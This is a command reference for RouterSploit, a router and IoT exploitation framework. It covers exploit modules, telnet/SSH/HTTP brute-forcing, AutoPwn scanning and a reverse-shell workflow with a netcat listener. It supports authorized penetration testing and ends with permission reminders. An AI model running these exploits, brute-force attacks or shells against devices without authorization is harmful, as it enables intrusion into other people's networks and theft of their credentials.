RouterSploit
Overview
Sección titulada «Overview»RouterSploit is an open-source exploitation framework designed for testing embedded devices, routers, and IoT equipment. It provides a modular approach to vulnerability assessment, credential testing, and exploitation of network devices similar to Metasploit but specialized for router and embedded device penetration testing.
Installation
Sección titulada «Installation»Ubuntu/Debian
Sección titulada «Ubuntu/Debian»git clone https://github.com/threat9/routersploit.git
cd routersploit
pip install -r requirements.txt
python3 rsf.pybrew install python3
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt
python3 rsf.pydocker run -it threat9/routersploitFrom Source
Sección titulada «From Source»git clone https://github.com/threat9/routersploit.git
cd routersploit
python3 setup.py install
python3 rsf.pyStarting the Interactive Console
Sección titulada «Starting the Interactive Console»python3 rsf.py
# RouterSploit> prompt appearsBasic Commands
Sección titulada «Basic Commands»| Command | Description |
|---|---|
help | Display all available commands |
show modules | List all available modules |
search [keyword] | Search modules by name or description |
use [module] | Load a specific module |
info | Display module information and options |
set [option] [value] | Configure module options |
back | Exit current module |
show options | Display current module options |
exploit or run | Execute the current module |
exit | Exit RouterSploit |
Module Types
Sección titulada «Module Types»Exploits
Sección titulada «Exploits»Modules that execute vulnerabilities to gain unauthorized access or control:
use exploits/d-link/dir_815_rce
use exploits/netgear/cmd_injection
use exploits/tp-link/authentication_bypass
use exploits/cisco/arbitrary_file_uploadCredential Testing
Sección titulada «Credential Testing»Modules for testing default credentials and brute-forcing:
use creds/telnet_bruteforce
use creds/ssh_bruteforce
use creds/http_bruteforce
use creds/default_credsScanners
Sección titulada «Scanners»Modules that scan for vulnerabilities without exploitation:
use scanners/autopwn
use scanners/port_scanner
use scanners/service_scanner
use scanners/vulnerability_scannerPayloads
Sección titulada «Payloads»Modules for generating and delivering payloads:
use payloads/reverse_shell
use payloads/bind_shellSearching and Listing Modules
Sección titulada «Searching and Listing Modules»Search by Keyword
Sección titulada «Search by Keyword»search d-link
search rce
search authentication
search remote_code_executionList All Modules
Sección titulada «List All Modules»show modules
show modules | grep exploit
show modules | grep creds
show modules | grep scannerGet Module Details
Sección titulada «Get Module Details»use exploits/netgear/cmd_injection
info
# Shows: description, options, required fields, vendor infoWorking with Exploits
Sección titulada «Working with Exploits»Basic Exploit Workflow
Sección titulada «Basic Exploit Workflow»# 1. Search for relevant exploit
search netgear
# 2. Load the module
use exploits/netgear/cmd_injection
# 3. View options
show options
# LHOST (attacker IP), LPORT (listener port), TARGET (target IP)
# 4. Set required options
set target 192.168.1.1
set lhost 192.168.1.100
set lport 4444
# 5. Execute exploit
exploit
# or
runSetting Target Information
Sección titulada «Setting Target Information»set target 192.168.1.1
set target http://192.168.1.1:8080
set rhost 192.168.1.1 # Remote hostSetting Payload Options
Sección titulada «Setting Payload Options»set lhost 192.168.1.100 # Listener/attacker host
set lport 4444 # Listener port
set lpass password123 # Listener password
set payload reverse_shellViewing Exploit Requirements
Sección titulada «Viewing Exploit Requirements»info
# Shows which options are required vs optional
show optionsCredential Testing
Sección titulada «Credential Testing»Default Credential Testing
Sección titulada «Default Credential Testing»use creds/default_creds
set target 192.168.1.1
set vendor netgear
exploitBrute-Force Attack
Sección titulada «Brute-Force Attack»use creds/telnet_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/passwords.txt
exploitHTTP Credential Brute-Force
Sección titulada «HTTP Credential Brute-Force»use creds/http_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/wordlist.txt
set threads 4
exploitSSH Brute-Force
Sección titulada «SSH Brute-Force»use creds/ssh_bruteforce
set target 192.168.1.1
set port 22
set username root
set wordlist /path/to/passwords.txt
exploitScanner Modules
Sección titulada «Scanner Modules»AutoPwn Scanner
Sección titulada «AutoPwn Scanner»Automatically scans for vulnerabilities and attempts exploitation:
use scanners/autopwn
set target 192.168.1.1
exploit
# Scans for known vulnerabilities and exploitation pathsPort Scanner
Sección titulada «Port Scanner»Identifies open ports on target:
use scanners/port_scanner
set target 192.168.1.1
set ports 1-1000
exploitService Detection
Sección titulada «Service Detection»Identifies services and versions:
use scanners/service_scanner
set target 192.168.1.1
exploitVulnerability Scanner
Sección titulada «Vulnerability Scanner»Scans for known vulnerabilities:
use scanners/vulnerability_scanner
set target 192.168.1.1
set vendor netgear
exploitSupported Vendors
Sección titulada «Supported Vendors»RouterSploit includes modules for major router and embedded device manufacturers:
| Vendor | Common Vulnerabilities |
|---|---|
| D-Link | Directory traversal, RCE, auth bypass |
| Netgear | Command injection, authenticated RCE |
| TP-Link | Authentication bypass, RCE |
| Cisco | File upload, auth bypass, buffer overflow |
| Huawei | Authentication bypass, RCE |
| Ubiquiti | Authentication bypass, RCE |
| Linksys | Command injection, firmware upload |
| Belkin | Default credentials, auth bypass |
| ASUS | Arbitrary file upload, RCE |
| Mikrotik | Authentication bypass, RCE |
Common Workflows
Sección titulada «Common Workflows»Reconnaissance and Exploitation
Sección titulada «Reconnaissance and Exploitation»# Step 1: Scan target network
use scanners/port_scanner
set target 192.168.1.1
exploit
# Step 2: Identify device and run AutoPwn
use scanners/autopwn
set target 192.168.1.1
exploit
# Step 3: Attempt default credentials
use creds/default_creds
set target 192.168.1.1
exploitTargeted Exploitation
Sección titulada «Targeted Exploitation»# Know target device? Search directly
search "TP-Link WR841N"
# Load specific exploit
use exploits/tp-link/wr841n_rce
# Set options
set target 192.168.1.1
set lhost 192.168.1.100
# Execute
exploitCredential Harvesting
Sección titulada «Credential Harvesting»# Multiple credential testing approaches
use creds/default_creds
set target 192.168.1.1
exploit
# Then brute-force remaining services
use creds/telnet_bruteforce
set target 192.168.1.1
exploitPost-Exploitation Shell Access
Sección titulada «Post-Exploitation Shell Access»# After successful exploit, obtain shell
# Set up listener (in separate terminal)
nc -lvnp 4444
# In RouterSploit, execute reverse shell payload
set payload reverse_shell
set lhost 192.168.1.100
set lport 4444
exploit
# Shell connects to listenerCustom Module Creation
Sección titulada «Custom Module Creation»Module Structure
Sección titulada «Module Structure»Create custom exploit at routersploit/modules/exploits/custom/:
from routersploit.modules import *
class Exploit(BaseExploit):
"""Custom Router Exploitation Module"""
info = {
'name': 'Custom Router RCE',
'description': 'Custom exploitation module description',
'vendor': 'Custom Vendor',
'model': 'Custom Model',
'version': '1.0',
}
target = Param.ip_addr('Target IP')
port = Param.port(80, 'Target port')
def check(self):
"""Check if target is vulnerable"""
# Vulnerability check logic
pass
def exploit(self):
"""Execute exploit"""
# Exploitation logic
passRouterSploit vs Metasploit
Sección titulada «RouterSploit vs Metasploit»| Feature | RouterSploit | Metasploit |
|---|---|---|
| Focus | Routers/IoT | General penetration testing |
| Learning Curve | Lower | Higher |
| Module Availability | Router-specific | Extensive (all targets) |
| Ease of Use | Simpler | More complex |
| Customization | Good | Excellent |
| Community | Smaller | Large |
| Target Scope | Embedded/Router | Broad |
| Price | Free | Free community version |
Advanced Options
Sección titulada «Advanced Options»Setting Threads for Brute-Force
Sección titulada «Setting Threads for Brute-Force»use creds/http_bruteforce
set threads 10
# Increases concurrent attemptsCustom Wordlists
Sección titulada «Custom Wordlists»set wordlist /path/to/custom/passwords.txt
set username_wordlist /path/to/usernames.txtTimeout Configuration
Sección titulada «Timeout Configuration»set timeout 10
# Increases response wait time for slow networksLogging Output
Sección titulada «Logging Output»exploit > output.log
# Capture results to fileTroubleshooting
Sección titulada «Troubleshooting»| Issue | Solution |
|---|---|
| Module not found | Use search to find correct module name |
| Connection refused | Verify target IP and port accessibility |
| Exploit fails silently | Run info to verify all required options set |
| Slow brute-force | Increase threads parameter |
| Python import errors | Reinstall dependencies: pip install -r requirements.txt |
Security Considerations
Sección titulada «Security Considerations»- Always obtain written permission before testing
- Use on devices you own or have explicit authorization to test
- RouterSploit should only be used for authorized security assessments
- Document all findings and exploitation attempts
- Disable unnecessary services on production routers
- Regularly update firmware on network devices
- Change default credentials immediately after device setup
Resources
Sección titulada «Resources»- Official GitHub: https://github.com/threat9/routersploit
- Module documentation in repository
- Vulnerability research databases (CVE, NVD)
- Vendor security advisories
- IoT security blogs and research papers